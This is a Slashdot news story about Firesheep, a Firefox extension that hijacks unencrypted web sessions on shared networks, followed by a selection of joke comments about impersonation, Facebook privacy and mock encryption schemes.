Slashdot Mirror

← Back to Stories (view on slashdot.org)

Firefox Extension Makes Social-Network ID Spoofing Trivial

Posted by timothy on from the plausible-deniability-for-farmville dept.

Orome1 writes "A simple-to-use Firefox plugin presented yesterday at Toorcon in San Diego has hit the security world with the realization that squabbles about Facebook's changing privacy settings and various privacy breaches simply miss the point. 'When it comes to user privacy, SSL is the elephant in the room,' said Eric Butler, the developer of the extension in question, dubbed Firesheep. By installing and running it, anyone can 'sniff out' the unencrypted HTTP sessions currently allowing users on that network segment to access social networks, online services and other website requiring a login, and simply hijack them and impersonate the user."

11 of 185 comments (clear)

  1. First haxx! by Anonymous Coward · · Score: 4, Funny

    Ha ha, anon is pwned :D

    1. Re:First haxx! by Anonymous Coward · · Score: 5, Funny

      WTF !, this guy is logged in as me !

    2. Re:First haxx! by Anonymous Coward · · Score: 1, Funny

      Dude, seriously, he probably isn't even using the plugin... Your password is one of the worst I've seen. Heck, even I cracked it (as you can see from this post)

    3. Re:First haxx! by Anonymous Coward · · Score: 2, Funny

      Remind me to change the combination to my luggage.

  2. Re:Why no encryption? by betterunixthanunix · · Score: 4, Funny

    Facebook's servers are too busy violating your privacy to handle the extra load of encryption ;)

    --
    Palm trees and 8
  3. My comments by formfeed · · Score: 2, Funny
    I'd like to declare that all comments under my user name that are controversial or could get me in trouble were made by someone else.

    Someone, who obviously must have sniffed out my wireless cookies. -Shame on them.

  4. Re:Use md5 (or something) over the wire by Culture20 · · Score: 4, Funny

    md5 is a hash algorithm. How would that help? If someone can snoop your md5 hash they can replay it to gain access to the server, and then change your password (provided the server doesn't provide a challenge to perform this action). All md5 does is protect your actual password, which is small protection if your account can be illicitly accessed anyway. None of these services send a password in plaintext (hopefully). That isn't the issue. The issue is that they use replayable tokens and don't use encryption to send them on the wire.

    Well, then md5 the hash. It's just like using triple-DES or double rot-13 (one of the two, or maybe a happy middle-ground). ;)

  5. Re:Why no encryption? by cerberusss · · Score: 4, Funny

    Facebook's servers are too busy violating your privacy to handle the extra load of encryption ;)

    Facebooks servers were hanging around in a dark alley one faithful night. My privacy just happened to think that particular night, let's take the shorter route home. It's as if Facebooks servers sniffed she was coming, despite her high privacy settings. They libpcaptured her, then stripped all of her headers and checksums, right to her to the bare profile while taunting her loudly. Some traffic just passed by without doing anything. My privacy was violated again, and again and Facebooks servers just kept going and going. Then they left my privacy "face"-down in a shallow ditch, some shreds of unique ROWIDs covering her bloodsoaked profile.

    --
    8 of 13 people found this answer helpful. Did you?
  6. Re:Use md5 (or something) over the wire by PatPending · · Score: 2, Funny

    md5 the password with Javascript on the client end before sending it. Then un-md5 it with PHP on the server.

    Or use quad-ROT13 instead.

    --
    What one fool can do, another can. (Ancient Simian Proverb)
  7. Re:Illegal? by Romberg · · Score: 3, Funny

    yeah, like I'm gonna click on your link.....

  8. Re:Use md5 (or something) over the wire by nomorecwrd · · Score: 2, Funny

    Bettter yet 1024-ROT13... it's a little time consuming, but totally worth it.